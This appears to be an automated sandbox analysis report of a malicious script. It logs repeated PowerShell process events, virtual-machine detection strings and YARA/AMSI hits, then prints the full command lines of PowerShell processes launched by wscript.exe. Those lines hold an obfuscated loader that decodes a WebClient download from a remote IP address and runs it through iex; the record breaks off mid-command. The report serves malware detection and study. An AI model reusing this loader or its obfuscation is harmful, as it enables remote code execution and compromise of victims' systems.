          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3624
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6231
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7844
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1766
          Source: C:\Windows\System32\wscript.exe TID: 7876 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5916 Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2276 Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicshutdown Hyper-V Guest Shutdown Service
          Source: wscript.exe, 00000000.00000003.1271680523.000001D5A7B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicheartbeat Hyper-V Heartbeat Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicvmsession Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q$Hyper-V Volume Shadow Copy Requestor
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Remote Desktop Virtualizati...
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicrdv Hyper-V Remote Desktop Virtualizati...
          Source: wscript.exe, 00000000.00000003.1271596131.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262046725.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1270688935.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1265664478.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274950930.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1266783931.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260517825.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274759946.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260425360.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262046725.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261264984.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q!Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicguestinterface Hyper-V Guest Service Interface
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #Hyper-V Remote Desktop Virtualizati
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Guest Shutdown Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Guest Service Interface
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q-Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
          Source: wscript.exe, 00000000.00000003.1271337918.000001D5A5C0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1273952548.000001D5A5C0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1266659730.000001D5A5C1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Heartbeat Service
          Source: wscript.exe, 00000000.00000002.1275119812.000001D5A7B30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Data Exchange Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q$Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmictimesync Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Stopped vmicvss
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: !Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicvss Hyper-V Volume Shadow Copy Requestor
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmickvpexchange Hyper-V Data Exchange Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Volume Shadow Copy Requestor
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Time Synchronization Service
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match File source: amsi64_8104.amsi.csv, type: OTHER
          Source: Yara match File source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: powershell.exe PID: 1040, type: MEMORYSTR
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. 
etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigt
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "get-service;$thickskulled='func';get-history;$thickskulled+='t';get-history;$thickskulled+='i';$hyldebusk=get-history;$thickskulled+='on:';(ni -p $thickskulled -n centralkomites -value { param($toenderne);$udlaansafdelingerne=5;do {$hypersonically78+=$toenderne[$udlaansafdelingerne];$udlaansafdelingerne+=6} until(!$toenderne[$udlaansafdelingerne])$hypersonically78});convertto-html;(ni -p $thickskulled -n desiodothyroxine3 -value {param($yodhs);.($likrer) ($yodhs)});convertto-html;$protozoal=centralkomites 'udhunnaandseh lvftknowi.sygehw';$protozoal+=centralkomites 'tra.pe ng ebgee.scstannl espiweekeeskrumnove,ft';$affaldsbehandlingssystem=centralkomites 'stensm suitotapwozplatfividerlrooinl kogla galm/';$humps=centralkomites 'unt,rt b ralshowes ksko1i ter2';$personnummers='natur[ mor.npaa eemondotell c.audiossuperedirkertilkmvkorreial efcpyramebrrespapprooassoriu visnwhi ktintegm per agrievn ddanafortrgfremhefren rsoutf]hellb: hove: ensesenguler.novcs wdeu postracadeielytrtavedrysoejlppardyrcodebobassitdeteko fermc utm.ou derl un,e=gener$unenchudkrau ponsmabeskpcheaps';$affaldsbehandlingssystem+=centralkomites 're.ym5 me e. re a0civil basha(,idsnwfjorti 